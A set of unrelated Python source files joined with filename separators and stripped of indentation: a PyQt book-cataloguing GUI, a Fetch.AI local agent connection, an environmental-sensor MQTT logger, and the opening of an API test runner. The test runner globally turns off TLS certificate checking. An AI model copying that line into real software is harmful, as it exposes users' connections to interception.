for dictionary in self.dictionary['image']:
for links in dictionary.values():
self.image_list += links
for link in self.image_list:
if link is None:
self.image_list.remove(link)
self.image_list = list(set(self.image_list))
print(self.image_list)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def next_image(self):
""" Next image from list """
try:
if len(self.image_list) > 1:
self.image_iterator += 1
if len(self.image_list) == self.image_iterator:
self.image_iterator = 0
self.dictionary["image"] = get_image(self.image_list[self.image_iterator], self.item) # pylint: disable=(line-too-long)
im = Image.open(self.dictionary["image"])
self.image_size_label.setText(str(im.size))
self.cover_image_label.setPixmap(QtGui.QPixmap(self.dictionary['image'])) # pylint: disable=(c-extension-no-member)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def previous_image(self):
""" Previous image from list """
try:
if len(self.image_list) > 1:
self.image_iterator -= 1
if self.image_iterator == -1:
self.image_iterator = len(self.image_list) -1
self.dictionary["image"] = get_image(self.image_list[self.image_iterator], self.item) # pylint: disable=(line-too-long)
im = Image.open(self.dictionary["image"])
self.image_size_label.setText(str(im.size))
self.cover_image_label.setPixmap(QtGui.QPixmap(self.dictionary['image'])) # pylint: disable=(c-extension-no-member)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def change_image(self):
''' Change image button method '''
try:
image_folder = self.config.get("General", "image_folder")
image_path = os.path.join(self.current_dir, image_folder)
image = os.path.join(image_path, str(self.item)+".jpg")
self.fileName, _ = QtWidgets.QFileDialog.getOpenFileName(None, "Open File", "",'Images (*.png *.xpm *.jpg)', options=self.options) # pylint: disable=(c-extension-no-member),(attribute-defined-outside-init),(line-too-long)
print(str(self.fileName))
try:
shutil.copy2(self.fileName, image)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
self.dictionary['image'] = image
im = Image.open(self.dictionary["image"])
self.image_size_label.setText(str(im.size))
self.cover_image_label.setPixmap(QtGui.QPixmap(self.dictionary['image'])) # pylint: disable=(c-extension-no-member)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def clear_line_edit(self):
''' Clear edit lines method'''
try:
self.isbn_line.clear()
self.title_line.clear()
self.author_line.clear()
self.publisher_line.clear()
self.year_line.clear()
self.amount_line.clear()
self.price_line.clear()
self.description_text_edit.clear()
self.name_line.clear()
self.category_line.clear()
self.cover_image_label.clear()
self.source_label.clear()
self.progress_bar.setValue(0)
self.id_line.clear()
self.sale_price_line.clear()
self.image_size_label.clear()
self.save_to_file_button.setDisabled(True)
self.word_press_button.setDisabled(True)
self.isbn_line.setFocus()
self.sale_check_box.setChecked(False)
self.release_check_box.setChecked(False)
self.gift_check_box.setChecked(False)
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
def save_item(self):
''' Save to file method '''
self.category_exist() # Start function to check category from header list
self.get_dictionary()
self.dictionary_to_save['image'] = (self.isbn_line.text())
try:
self.fileNameSave, _ = QtWidgets.QFileDialog.getSaveFileName(None,"Open File", "","All Files (*)", options=self.options) # pylint: disable=(attribute-defined-outside-init),(c-extension-no-member)(line-too-long)
self.fileNameSave, self.fileNameSave_extension = os.path.splitext(self.fileNameSave) # pylint: disable=(attribute-defined-outside-init)
if self.fileNameSave_extension == '.txt': # pylint: disable=(attribute-defined-outside-init)
self.save_item_txt()
else:
self.fileNameSave_extension = ".csv" # pylint: disable=(attribute-defined-outside-init)
self.save_item_csv()
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
self.isbn_line.setFocus()
# Save to csv method
def save_item_csv(self):
''' Save to .csv '''
try:
with open(self.fileNameSave + self.fileNameSave_extension, 'w',encoding=None) as f:
w = csv.DictWriter(f, self.dictionary_to_save.keys())
w.writeheader()
w.writerow(self.dictionary_to_save)
if not len(self.fileNameSave) == 0:
self.clear_line_edit()
self.update_info_label.setText("File saved")
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
# Save to txt method
def save_item_txt(self):
''' Save to .txt '''
try:
with io.open(self.fileNameSave + self.fileNameSave_extension, 'w',encoding=None) as f:
f.write(json.dumps(self.dictionary_to_save))
self.clear_line_edit()
self.update_info_label.setText("File saved")
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
# Open settings button method
def open_settings(self):
''' Open settings method '''
self.settings_window = QtWidgets.QDialog() # pylint: disable=(attribute-defined-outside-init),(c-extension-no-member)
self.settings_window.setWindowIcon(QtGui.QIcon(os.path.join(self.current_dir, "private", "image", "bookloader.png"))) # pylint: disable=(c-extension-no-member, line-too-long)
self.settings_ui = Ui_Settings() # pylint: disable=(attribute-defined-outside-init)
self.settings_ui.setupUi(self.settings_window)
# Set Parser for config.ini
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), 'config', 'conf.ini'))
self.settings_ui.isbndb_check_box.setChecked(util.strtobool(config.get('Source', 'isbndb')))
self.settings_ui.google_check_box.setChecked(util.strtobool(config.get('Source', 'google')))
self.settings_ui.amazon_check_box.setChecked(util.strtobool(config.get('Source', 'amazon')))
self.settings_ui.goodreads_check_box.setChecked(util.strtobool(config.get('Source', 'goodreads'))) # pylint: disable=(line-too-long)
for radio in self.settings_ui.list_of_radio:
if config.get('Validator', 'priority') in radio.text().lower():
radio.setChecked(True)
self.settings_window.show()
# Get header category list from .ini file
def categories_main_list(self):
''' Category list '''
try:
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), 'config', 'conf.ini'))
self.category_completer_list = ast.literal_eval(config.get("Category", "categories"))
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
return self.category_completer_list
# Check category button method
def category_exist(self):
''' Compare category list '''
self.category_to_save = [] # pylint:disable=(attribute-defined-outside-init)
try:
self.cat = self.category_line.text().split(',') # pylint: disable=(attribute-defined-outside-init)
for i in self.cat:
if i[0] == ' ':
i = i[1:]
if i in self.category_completer_list:
self.category_to_save.append(i)
self.category_line.setText(",".join(self.category_to_save))
except Exception as error: # pylint: disable=broad-except
print(error)
logger.info(error)
return self.category_to_save
def closeEvent(self, event):
''' Close event method '''
reply = QtWidgets.QMessageBox.question(self, 'Close window', # pylint: disable=(c-extension-no-member)
'Are you sure you want to close the window?',
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No) # pylint: disable=(c-extension-no-member)
if reply == QtWidgets.QMessageBox.Yes: # pylint: disable=(c-extension-no-member)
event.accept()
print('Window closed')
cache = pathlib.Path(os.path.join(self.current_dir, "cache"))
if cache.exists() and cache.is_dir():
shutil.rmtree(cache)
else:
event.ignore()
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv) # pylint: disable=(c-extension-no-member)
MyMainWindow = MyMainWindow()
MyMainWindow.show()
sys.exit(app.exec_())
|
connection.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Extension to the Local Node."""
import asyncio
import copy
import logging
from asyncio import AbstractEventLoop, Queue
from collections import defaultdict
from threading import Thread
from typing import Dict, List, Optional, Tuple, cast
from aea.configurations.base import ProtocolId, PublicId
from aea.connections.base import Connection, ConnectionStates
from aea.helpers.search.models import Description
from aea.mail.base import AEAConnectionError, Address, Envelope
from aea.protocols.default.message import DefaultMessage
from packages.fetchai.protocols.oef_search.dialogues import (
OefSearchDialogue,
OefSearchDialogues,
)
from packages.fetchai.protocols.oef_search.message import OefSearchMessage
_default_logger = logging.getLogger("aea.packages.fetchai.connections.local")
TARGET = 0
MESSAGE_ID = 1
RESPONSE_TARGET = MESSAGE_ID
RESPONSE_MESSAGE_ID = MESSAGE_ID + 1
STUB_DIALOGUE_ID = 0
PUBLIC_ID = PublicId.from_str("fetchai/local:0.6.0")
class LocalNode:
"""A light-weight local implementation of a OEF Node."""
def __init__(
self, loop: AbstractEventLoop = None, logger: logging.Logger = _default_logger
):
"""
Initialize a local (i.e. non-networked) implementation of an OEF Node.
:param loop: the event loop. If None, a new event loop is instantiated.
"""
self.services = defaultdict(lambda: []) # type: Dict[str, List[Description]]
self._lock = asyncio.Lock()
self._loop = loop if loop is not None else asyncio.new_event_loop()
self._thread = Thread(target=self._run_loop, daemon=True)
self._in_queue = asyncio.Queue(loop=self._loop) # type: asyncio.Queue
self._out_queues = {} # type: Dict[str, asyncio.Queue]
self._receiving_loop_task = None # type: Optional[asyncio.Task]
self.address: Optional[Address] = None
self._dialogues: Optional[OefSearchDialogues] = None
self.logger = logger
def __enter__(self):
"""Start the local node."""
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Stop the local node."""
self.stop()
def _run_loop(self):
"""
Run the asyncio loop.
This method is supposed to be run only in the Multiplexer thread.
"""
self.logger.debug("Starting threaded asyncio loop...")
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
self.logger.debug("Asyncio loop has been stopped.")
async def connect(
self, address: Address, writer: asyncio.Queue
) -> Optional[asyncio.Queue]:
"""
Connect an address to the node.
:param address: the address of the agent.
:param writer: the queue where the client is listening.
:return: an asynchronous queue, that constitutes the communication channel.
"""
if address in self._out_queues.keys():
return None
assert self._in_queue is not None
q = self._in_queue # type: asyncio.Queue
self._out_queues[address] = writer
self.address = address
self._dialogues = OefSearchDialogues(
agent_address=str(OEFLocalConnection.connection_id)
)
return q
def start(self):
"""Start the node."""
if not self._loop.is_running() and not self._thread.is_alive():
self._thread.start()
self._receiving_loop_task = asyncio.run_coroutine_threadsafe(
self.receiving_loop(), loop=self._loop
)
self.logger.debug("Local node has been started.")
def stop(self):
"""Stop the node."""
asyncio.run_coroutine_threadsafe(self._in_queue.put(None), self._loop).result()
self._receiving_loop_task.result()
if self._loop.is_running():
self._loop.call_soon_threadsafe(self._loop.stop)
if self._thread.is_alive():
self._thread.join()
async def receiving_loop(self):
"""Process incoming messages."""
while True:
envelope = await self._in_queue.get()
if envelope is None:
self.logger.debug("Receiving loop terminated.")
return
self.logger.debug("Handling envelope: {}".format(envelope))
await self._handle_envelope(envelope)
async def _handle_envelope(self, envelope: Envelope) -> None:
"""Handle an envelope.
:param envelope: the envelope
:return: None
"""
if envelope.protocol_id == ProtocolId.from_str("fetchai/oef_search:0.4.0"):
await self._handle_oef_message(envelope)
else:
await self._handle_agent_message(envelope)
async def _handle_oef_message(self, envelope: Envelope) -> None:
"""Handle oef messages.
:param envelope: the envelope
:return: None
"""
assert isinstance(
envelope.message, OefSearchMessage
), "Message not of type OefSearchMessage"
oef_message, dialogue = self._get_message_and_dialogue(envelope)
if dialogue is None:
self.logger.warning(
"Could not create dialogue for message={}".format(oef_message)
)
return
if oef_message.performative == OefSearchMessage.Performative.REGISTER_SERVICE:
await self._register_service(
envelope.sender, oef_message.service_description
)
elif (
oef_message.performative == OefSearchMessage.Performative.UNREGISTER_SERVICE
):
await self._unregister_service(oef_message, dialogue)
elif oef_message.performative == OefSearchMessage.Performative.SEARCH_SERVICES:
await self._search_services(oef_message, dialogue)
else:
# request not recognized
pass
async def _handle_agent_message(self, envelope: Envelope) -> None:
"""
Forward an envelope to the right agent.
:param envelope: the envelope
:return: None
"""
destination = envelope.to
if destination not in self._out_queues.keys():
msg = DefaultMessage(
performative=DefaultMessage.Performative.ERROR,
dialogue_reference=("", ""),
target=TARGET,
message_id=MESSAGE_ID,
error_code=DefaultMessage.ErrorCode.INVALID_DIALOGUE,
error_msg="Destination not available",
error_data={}, # TODO: reference incoming message.
)
error_envelope = Envelope(
to=envelope.sender,
sender=str(OEFLocalConnection.connection_id),
protocol_id=DefaultMessage.protocol_id,
message=msg,
)
await self._send(error_envelope)
return
else:
await self._send(envelope)
async def _register_service(
self, address: Address, service_description: Description
):
"""
Register a service agent in the service directory of the node.
:param address: the address of the service agent to be registered.
:param service_description: the description of the service agent to be registered.
:return: None
"""
async with self._lock:
self.services[address].append(service_description)
async def _unregister_service(
self, oef_search_msg: OefSearchMessage, dialogue: OefSearchDialogue,
) -> None:
"""
Unregister a service agent.
:param oef_search_msg: the incoming message.
:param dialogue: the dialogue.
:return: None
"""
service_description = oef_search_msg.service_description
address = oef_search_msg.sender
async with self._lock:
if address not in self.services:
msg = OefSearchMessage(
performative=OefSearchMessage.Performative.OEF_ERROR,
target=oef_search_msg.message_id,
message_id=oef_search_msg.message_id + 1,
oef_error_operation=OefSearchMessage.OefErrorOperation.UNREGISTER_SERVICE,
dialogue_reference=dialogue.dialogue_label.dialogue_reference,
)
msg.counterparty = oef_search_msg.sender
assert dialogue.update(msg)
envelope = Envelope(
to=msg.counterparty,
sender=msg.sender,
protocol_id=msg.protocol_id,
message=msg,
)
await self._send(envelope)
else:
self.services[address].remove(service_description)
if len(self.services[address]) == 0:
self.services.pop(address)
async def _search_services(
self, oef_search_msg: OefSearchMessage, dialogue: OefSearchDialogue,
) -> None:
"""
Search the agents in the local Service Directory, and send back the result.
This is actually a dummy search, it will return all the registered agents with the specified data model.
If the data model is not specified, it will return all the agents.
:param oef_search_msg: the message.
:param dialogue: the dialogue.
:return: None
"""
async with self._lock:
query = oef_search_msg.query
result = [] # type: List[str]
if query.model is None:
result = list(set(self.services.keys()))
else:
for agent_address, descriptions in self.services.items():
for description in descriptions:
if description.data_model == query.model:
result.append(agent_address)
msg = OefSearchMessage(
performative=OefSearchMessage.Performative.SEARCH_RESULT,
target=oef_search_msg.message_id,
dialogue_reference=dialogue.dialogue_label.dialogue_reference,
message_id=oef_search_msg.message_id + 1,
agents=tuple(sorted(set(result))),
)
msg.counterparty = oef_search_msg.sender
assert dialogue.update(msg)
envelope = Envelope(
to=msg.counterparty,
sender=msg.sender,
protocol_id=msg.protocol_id,
message=msg,
)
await self._send(envelope)
def _get_message_and_dialogue(
self, envelope: Envelope
) -> Tuple[OefSearchMessage, Optional[OefSearchDialogue]]:
"""
Get a message copy and dialogue related to this message.
:param envelope: incoming envelope
:return: Tuple[MEssage, Optional[Dialogue]]
"""
assert self._dialogues is not None, "Call connect before!"
message_orig = cast(OefSearchMessage, envelope.message)
message = copy.copy(
message_orig
) # TODO: fix; need to copy atm to avoid overwriting "is_incoming"
message.is_incoming = True # TODO: fix; should be done by framework
message.counterparty = (
message_orig.sender
) # TODO: fix; should be done by framework
dialogue = cast(OefSearchDialogue, self._dialogues.update(message))
return message, dialogue
async def _send(self, envelope: Envelope):
"""Send a message."""
destination = envelope.to
destination_queue = self._out_queues[destination]
destination_queue._loop.call_soon_threadsafe(destination_queue.put_nowait, envelope) # type: ignore # pylint: disable=protected-access
self.logger.debug("Send envelope {}".format(envelope))
async def disconnect(self, address: Address) -> None:
"""
Disconnect.
:param address: the address of the agent
:return: None
"""
async with self._lock:
self._out_queues.pop(address, None)
self.services.pop(address, None)
class OEFLocalConnection(Connection):
"""
Proxy to the functionality of the OEF.
It allows the interaction between agents, but not the search functionality.
It is useful for local testing.
"""
connection_id = PUBLIC_ID
def __init__(self, local_node: Optional[LocalNode] = None, **kwargs):
"""
Load the connection configuration.
Initialize a OEF proxy for a local OEF Node
:param local_node: the Local OEF Node object. This reference must be the same across the agents of interest. (Note, AEA loader will not accept this argument.)
"""
super().__init__(**kwargs)
self._local_node = local_node
self._reader = None # type: Optional[Queue]
self._writer = None # type: Optional[Queue]
async def connect(self) -> None:
"""Connect to the local OEF Node."""
assert self._local_node is not None, "No local node set!"
if self.is_connected:
return # pragma: nocover
self._state.set(ConnectionStates.connecting)
self._reader = Queue()
self._writer = await self._local_node.connect(self.address, self._reader)
self._state.set(ConnectionStates.connected)
async def disconnect(self) -> None:
"""Disconnect from the local OEF Node."""
assert self._local_node is not None, "No local node set!"
if self.is_disconnected:
return # pragma: nocover
self._state.set(ConnectionStates.disconnecting)
assert self._reader is not None
await self._local_node.disconnect(self.address)
await self._reader.put(None)
self._reader, self._writer = None, None
self._state.set(ConnectionStates.disconnected)
async def send(self, envelope: Envelope):
"""Send a message."""
if not self.is_connected:
raise AEAConnectionError(
"Connection not established yet. Please use 'connect()'."
)
self._writer._loop.call_soon_threadsafe(self._writer.put_nowait, envelope) # type: ignore # pylint: disable=protected-access
async def receive(self, *args, **kwargs) -> Optional["Envelope"]:
"""
Receive an envelope. Blocking.
:return: the envelope received, or None.
"""
if not self.is_connected:
raise AEAConnectionError(
"Connection not established yet. Please use 'connect()'."
)
try:
assert self._reader is not None
envelope = await self._reader.get()
if envelope is None:
self.logger.debug("Receiving task terminated.")
return None
self.logger.debug("Received envelope {}".format(envelope))
return envelope
except Exception: # pragma: nocover # pylint: disable=broad-except
return None
|
logger.py
|
import collections
import threading
import traceback
import json
from subprocess import PIPE, Popen, check_output
import paho.mqtt.client as mqtt
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
from bme280 import BME280
from enviroplus import gas
from pms5003 import PMS5003
class EnvLogger:
def __init__(self, client_id, host, port, username, password, prefix,
use_pms5003, room, num_samples):
self.bme280 = BME280()
self.client_id = client_id
self.prefix = prefix
self.room = room
self.connection_error = None
self.client = mqtt.Client(client_id=client_id)
self.client.on_connect = self.__on_connect
self.client.username_pw_set(username, password)
self.client.connect(host, port)
self.client.loop_start()
self.samples = collections.deque(maxlen=num_samples)
self.latest_pms_readings = {}
self.use_pms5003 = use_pms5003
if self.use_pms5003:
self.pm_thread = threading.Thread(
target=self.__read_pms_continuously)
self.pm_thread.daemon = True
self.pm_thread.start()
def __on_connect(self, client, userdata, flags, rc):
errors = {
1: "incorrect MQTT protocol version",
2: "invalid MQTT client identifier",
3: "server unavailable",
4: "bad username or password",
5: "connection refused"
}
if rc > 0:
self.connection_error = errors.get(rc, "unknown error")
def __read_pms_continuously(self):
"""Continuously reads from the PMS5003 sensor and stores the most recent values
in `self.latest_pms_readings` as they become available.
If the sensor is not polled continously then readings are buffered on the PMS5003,
and over time a significant delay is introduced between changes in PM levels and
the corresponding change in reported levels."""
pms = PMS5003()
while True:
try:
pm_data = pms.read()
self.latest_pms_readings = {
"pm10": pm_data.pm_ug_per_m3(
1.0), #, atmospheric_environment=True),
"pm25": pm_data.pm_ug_per_m3(
2.5), #, atmospheric_environment=True),
"pm100": pm_data.pm_ug_per_m3(
10), #, atmospheric_environment=True),
}
except:
print("Failed to read from PMS5003. Resetting sensor.")
traceback.print_exc()
pms.reset()
def remove_sensor_config(self):
"""
Remove previous config topic cretead for each sensor
"""
print("removed")
sensors = [
"proximity",
"lux",
"temperature",
"pressure",
"humidity",
"oxidising",
"reducing",
"nh3",
"pm10",
"pm25",
"pm100",
]
for sensor in sensors:
sensor_topic_config = f"sensor/{self.room}/{sensor}/config"
self.publish(sensor_topic_config, '')
def sensor_config(self):
"""
Create config topic for each sensor
"""
# homeassistant/sensor/livingRoom/temperature/config
# homeassistant/sensor/livingRoom/temperature/state
# homeassistant/livingroom/enviroplus/state
sensors = {
"proximity": {
"unit_of_measurement": "cm",
"value_template": "{{ value_json }}"
},
"lux": {
"device_class": "illuminance",
"unit_of_measurement": "lx",
"value_template": "{{ value_json }}",
"icon": "mdi:weather-sunny"
},
"temperature": {
"device_class": "temperature",
"unit_of_measurement": "°C",
"value_template": "{{ value_json }}",
"icon": "mdi:thermometer"
},
"pressure": {
"device_class": "pressure",
"unit_of_measurement": "hPa",
"value_template": "{{ value_json }}",
"icon": "mdi:arrow-down-bold"
},
"humidity": {
"device_class": "humidity",
"unit_of_measurement": "%H",
"value_template": "{{ value_json }}",
"icon": "mdi:water-percent"
},
"oxidising": {
"unit_of_measurement": "no2",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
"reducing": {
"unit_of_measurement": "CO",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
"nh3": {
"unit_of_measurement": "nh3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
}
if self.use_pms5003:
sensors["pm10"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
sensors["pm25"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
sensors["pm100"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
try:
for sensor in sensors:
sensors[sensor]["name"] = f"{self.room} {sensor.capitalize()}"
sensors[sensor][
"state_topic"] = f"{self.prefix}/sensor/{self.room}/{sensor}/state"
sensors[sensor]["unique_id"] = f"{sensor}-{self.client_id}"
sensor_topic_config = f"sensor/{self.room}/{sensor}/config"
self.publish(sensor_topic_config, json.dumps(sensors[sensor]))
print("Configs added")
except:
print("Failed to add configs.")
traceback.print_exc()
# Get CPU temperature to use for compensation
def get_cpu_temperature(self):
process = Popen(["vcgencmd", "measure_temp"],
stdout=PIPE,
universal_newlines=True)
output, _error = process.communicate()
return float(output[output.index("=") + 1:output.rindex("'")])
def take_readings(self):
# Tuning factor for compensation. Decrease this number to adjust the
# temperature down, and increase to adjust up
temp_comp_factor = 1.7
cpu_temp = self.get_cpu_temperature()
raw_temp = self.bme280.get_temperature() # float
comp_temp = raw_temp - ((cpu_temp - raw_temp) / temp_comp_factor)
hum_comp_factor = 1.3
gas_data = gas.read_all()
readings = {
"proximity": ltr559.get_proximity(),
"lux": int(ltr559.get_lux()),
"temperature": round(comp_temp, 1),
"pressure": round(int(self.bme280.get_pressure() * 100),
-1), # round to nearest 10
"humidity":
round(int(self.bme280.get_humidity() * hum_comp_factor), 1),
"oxidising": int(gas_data.oxidising / 1000),
"reducing": int(gas_data.reducing / 1000),
"nh3": int(gas_data.nh3 / 1000),
}
readings.update(self.latest_pms_readings)
return readings
def publish(self, topic, value):
topic = self.prefix.strip("/") + "/" + topic
self.client.publish(topic, str(value))
def update(self, publish_readings=True):
self.samples.append(self.take_readings())
if publish_readings:
for topic in self.samples[0].keys():
value_sum = sum([d[topic] for d in self.samples])
value_avg = round(value_sum / len(self.samples), 1)
#print(topic, value_avg)
self.publish(f"sensor/{self.room}/{topic}/state", value_avg)
def destroy(self):
self.client.disconnect()
self.client.loop_stop()
|
execution.py
|
import ast
import json
import re
import ssl
import time
from datetime import datetime
from multiprocessing import Pool
from threading import Thread
import pytz
import requests
from bson import ObjectId
from flask import current_app
from requests.cookies import RequestsCookieJar
from app import app
from config import Config
from controllers.mail import get_mails_by_group
from controllers.mail_sender import send_cron_email
from controllers.temp_cookies import save_cookies_for_suite, get_cookies_by_suite
from controllers.temp_suite_params import save_temp_params_for_suite, get_temp_params_by_suite
from controllers.test_env_param import get_global_env_vars
from controllers.test_plan_report import save_plan_report
from controllers.test_report import save_report_detail, save_report
from controllers.test_suite import get_suite_name
from execution_engine.data_initialize.handler import execute_data_init
from models.plan import Plan
from models.test_case import TestCase
from models.test_suite import TestSuite
from utils import common
from utils import send_notify
from utils import fake
# useless
ssl._create_default_https_context = ssl._create_unverified_context
requests.packages.urllib3.disable_warnings()
test_conclusion = {
0: "pass",
1: "failed",
2: "error",
3: "notRun"
}
config = Config()
host_ip = config.get_host()
host_port = config.get_port()
def get_case_list_by_suite(test_suite_id, include_forbidden=False):
returned_case_list = []
sort_query = [('sequence', 1), ('createAt', 1)]
if test_suite_id:
if include_forbidden:
find_query = {
'testSuiteId': ObjectId(test_suite_id),
'isDeleted': {'$ne': True}
}
else:
find_query = {
'testSuiteId': ObjectId(test_suite_id),
'isDeleted': {'$ne': True},
'status': True
}
for test_case in TestCase.find(find_query).sort(sort_query):
test_case_dict = common.format_response_in_dic(test_case)
if 'lastManualResult' in test_case_dict:
test_case_dict.pop('lastManualResult')
returned_case_list.append(test_case_dict)
return returned_case_list
# 异步装饰器
def async_test(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
# 基础测试类,负责获取测试用例的参数,请求,验证等信息后,进行测试,测试通过则返回{'status': 'ok'} ,
# 不通过则返回{'status': 'failed'}
class ExecutionEngine:
def __init__(self, protocol, domain, test_env_id=None, global_env_vars=None, test_result_list=None, max_retries=5,
global_suite_vars=None):
self.test_env_id = test_env_id
self.protocol = protocol
self.domain = domain
self.session = requests.Session()
if isinstance(max_retries, int) and max_retries > 0:
# 设置连接重试
adapters = requests.adapters.HTTPAdapter(max_retries=max_retries)
self.session.mount('https://', adapters)
self.session.mount('http://', adapters)
self.test_result_list = test_result_list
self.global_vars = {}
if global_env_vars is not None:
if not isinstance(global_env_vars, dict):
raise ValueError('global_env_vars must be a dict!')
self.global_vars.update(global_env_vars)
if global_suite_vars is not None:
if not isinstance(global_suite_vars, dict):
raise ValueError('global_suite_vars must be a dict!')
self.global_vars.update(global_suite_vars)
def execute_single_case_test(self, test_case, is_debug=False):
returned_data = dict()
returned_data["_id"] = ObjectId(test_case["_id"])
returned_data["testConclusion"] = []
# 存储 处理过后的testCaseDetail
returned_data["testCaseDetail"] = {}
if not isinstance(test_case, dict):
returned_data["status"] = 'failed'
returned_data["testConclusion"].append({'resultType': test_conclusion.get(2), 'reason': "测试用例结构不正确"})
return returned_data
def validate_test_case(case):
required_key_list = ['route', 'requestMethod']
return all([required_key in case for required_key in required_key_list])
if not validate_test_case(test_case):
returned_data["status"] = 'failed'
returned_data["testConclusion"].append({'resultType': test_conclusion.get(2), 'reason': "接口必要参数不完整"})
return returned_data
if test_case.get('isClearCookie'):
self.session.cookies.clear()
session = self.session
request_url = None
request_method = None
request_headers = dict()
request_body = None
check_response_code = None
check_spend_seconds = None
check_response_body = None
check_response_number = None
set_global_vars = None # for example {'user': 'user1'}
temp_suite_params = dict()
new_temp_suite_params = dict()
# 如果是debug测试用例,需要拿到临时Suite变量
if is_debug:
if 'testSuiteId' in test_case and test_case["testSuiteId"]:
temp_suite_params = get_temp_params_by_suite(test_case["testSuiteId"])
if temp_suite_params:
self.global_vars.update(temp_suite_params)
# 获取接口protocol
if 'requestProtocol' in test_case and isinstance(test_case["requestProtocol"], str) \
and (test_case["requestProtocol"] == 'HTTP' or test_case["requestProtocol"] == 'HTTPS'):
protocol = test_case["requestProtocol"]
else:
protocol = self.protocol
# 获取接口domain
if 'domain' in test_case and isinstance(test_case["domain"], str) and not test_case["domain"].strip() == '':
domain = test_case["domain"]
else:
domain = self.domain
# 替换domain中的${service} (如果存在)
if 'service' in test_case and isinstance(test_case["service"], str) \
and not test_case["service"].strip() == '':
domain = common.replace_global_var_for_str(init_var_str=domain,
global_var_dic={'service': test_case["service"]})
domain = common.replace_global_var_for_str(init_var_str=domain,
global_var_dic=self.global_vars)
# 处理url protocol+domain+route
route = common.replace_global_var_for_str(init_var_str=test_case['route'], global_var_dic=self.global_vars) \
if isinstance(test_case['route'], str) else test_case['route']
request_url = '%s://%s%s' % (protocol.lower(), domain, route)
returned_data['testCaseDetail']['url'] = request_url
# 获取method
request_method = test_case['requestMethod']
returned_data['testCaseDetail']['requestMethod'] = request_method
# 处理headers
if 'headers' in test_case and test_case['headers'] not in ["", None, {}, {'': ''}]:
if isinstance(test_case['headers'], list):
for header in test_case['headers']:
if not header['name'].strip() == '':
request_headers[header['name']] = common.replace_global_var_for_str(
init_var_str=header['value'],
global_var_dic=self.global_vars) \
if isinstance(header['value'], str) else header['value']
else:
raise TypeError('headers must be list!')
request_headers = None if request_headers == {} else request_headers
returned_data['headers'] = request_headers
# 验证requestBody格式 list[dict]
if 'requestBody' in test_case and not isinstance(test_case['requestBody'], list):
raise TypeError("requestBody must be a list")
if 'requestBody' in test_case and isinstance(test_case['requestBody'], list):
for list_item in test_case['requestBody']:
if not isinstance(list_item, dict):
raise TypeError("requestBody must be a dict list")
if 'requestBody' in test_case and len(test_case['requestBody']) > 0:
if test_case['requestMethod'].lower() == 'get':
request_url += '?'
for key, value in test_case['requestBody'][0].items():
if value is not None:
request_url += '%s=%s&' % (key, value)
request_url = fake.resolve_faker_var(init_faker_var=request_url)
request_url = common.replace_global_var_for_str(init_var_str=request_url,
global_var_dic=self.global_vars)
request_url = common.resolve_int_var(init_int_str=request_url)
request_url = request_url[0:(len(request_url) - 1)]
returned_data['testCaseDetail']['url'] = request_url
else:
# list 先转 str,方便全局变量替换
test_case['requestBody'] = str(test_case['requestBody'])
# 替换faker变量
request_body_str = fake.resolve_faker_var(init_faker_var=test_case['requestBody'])
# 全局替换
request_body_str = common.replace_global_var_for_str(init_var_str=request_body_str,
global_var_dic=self.global_vars)
# 替换requestBody中的Number类型(去除引号)
request_body_str = common.replace_global_var_for_str(init_var_str=request_body_str,
global_var_dic=self.global_vars,
global_var_regex=r'\'\$num{.*?}\'',
match2key_sub_string_start_index=6,
match2key_sub_string_end_index=-2
)
# 替换 需要去除引号的 int变量
request_body_str = common.resolve_int_var(init_int_str=request_body_str)
if 'isJsonArray' not in test_case or not test_case['isJsonArray']:
request_body_str = request_body_str[1:-1]
# 转回 dict or list
request_body = ast.literal_eval(request_body_str)
returned_data['testCaseDetail']['requestBody'] = request_body
# 处理 全局变量
if 'setGlobalVars' in test_case and test_case['setGlobalVars'] not in [[], {}, "", None]:
set_global_vars = test_case['setGlobalVars']
# add by Vincent-Lee for data initial # 2020-1-7 16:40:56
# 处理数据初始化 dataInitializes
if 'dataInitializes' in test_case and test_case['dataInitializes'] not in ["", None, {}, {'': ''}]:
if isinstance(test_case['headers'], list):
returned_data["dataInitResult"] = []
for dataInitialize in test_case['dataInitializes']:
if not dataInitialize['dbConfigId'].strip() == '':
returned_data["dataInitResult"].append(
execute_data_init(self.test_env_id, dataInitialize, self.global_vars))
